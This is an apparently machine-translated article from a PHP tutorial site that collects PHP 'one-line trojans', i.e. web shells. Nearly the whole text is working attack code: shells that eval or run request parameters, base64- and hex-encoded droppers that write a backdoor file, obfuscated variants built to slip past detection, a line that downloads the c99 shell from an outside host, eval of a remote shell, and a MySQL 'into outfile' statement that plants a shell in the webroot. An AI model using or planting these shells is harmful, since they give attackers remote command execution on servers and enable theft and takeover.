Heim  >  Artikel  >  Backend-Entwicklung  >  PHP-Einsatz-Trojaner-Zusammenfassung und SQL-Anweisung zum Schreiben eines Einsatz-Trojaners

PHP-Einsatz-Trojaner-Zusammenfassung und SQL-Anweisung zum Schreiben eines Einsatz-Trojaners

藏色散人
藏色散人nach vorne
2019-10-11 13:18:544216Durchsuche

1. Ein Wort zur Basisklasse – die Funktion ist auf Verifizierungsschwachstellen beschränkt, die in der Praxis sehr leicht zu erkennen sind:

<?php @eval($_GET["code"])?>
<?php @system($_POST["cmd"])?>

2. Art der Kodierungsersetzung:

<?php @fputs(fopen(base64_decode(&#39;bG9zdC5waHA=&#39;),w),base64_decode(&#39;PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==&#39;));?>
//会生成<?php @eval($_POST[&#39;lostwolf&#39;]);?>

<script language="php">@fputs(fopen(base64_decode(&#39;bG9zdC5waHA=&#39;),w),base64_decode(&#39;PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==&#39;));</script>
//php在html内部的一种嵌入方式

<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>


<?php
session_start();
$_POST[&#39;code&#39;] && $_SESSION[&#39;theCode&#39;] = trim($_POST[&#39;code&#39;]);
$_SESSION[&#39;theCode&#39;]&&preg_replace(&#39;\&#39;a\&#39;eis&#39;,&#39;e&#39;.&#39;v&#39;.&#39;a&#39;.&#39;l&#39;.&#39;(base64_decode($_SESSION[\&#39;theCode\&#39;]))&#39;,&#39;a&#39;);?>

3. Andere Typen:

<?php $_GET[a]($_GET[b]);?>
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
<?php assert($_REQUEST["pass"]);?>     //菜刀连接 躲避检测 密码pass 
<?php substr(md5($_REQUEST[&#39;x&#39;]),28)==&#39;acd0&#39;&&eval($_REQUEST[&#39;pass&#39;]);?>
//菜刀提交  http://192.168.1.5/x.php?x=lostwolf  脚本类型:php  密码为 pass

4. Download-Typ:

<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> 
<? echo file_get_contents("..//cfg_database.php");?> //显示某文件
<? eval ( file_get_contents("远程shell")) ?> //运行远程shell

5. Kein Schlüsselfunktionstyp:

<?php
$_="";
$_[+""]=&#39;&#39;;
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${&#39;_&#39;.$_}[&#39;_&#39;](${&#39;_&#39;.$_}[&#39;__&#39;]);?>
http://site/2.php?_=assert&__=eval($_POST[&#39;pass&#39;]) 密码是pass
<?$_="";$_[+""]=&#39;_&#39;;$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

6. Ergänzende Wissenspunkte:

Schreiben Sie einen Satz in SQL (MySQL):

select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以

Weitere PHP-bezogene Kenntnisse finden Sie auf der PHP-Chinese-Website!

Das obige ist der detaillierte Inhalt vonPHP-Einsatz-Trojaner-Zusammenfassung und SQL-Anweisung zum Schreiben eines Einsatz-Trojaners. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Dieser Artikel ist reproduziert unter:cnblogs.com. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen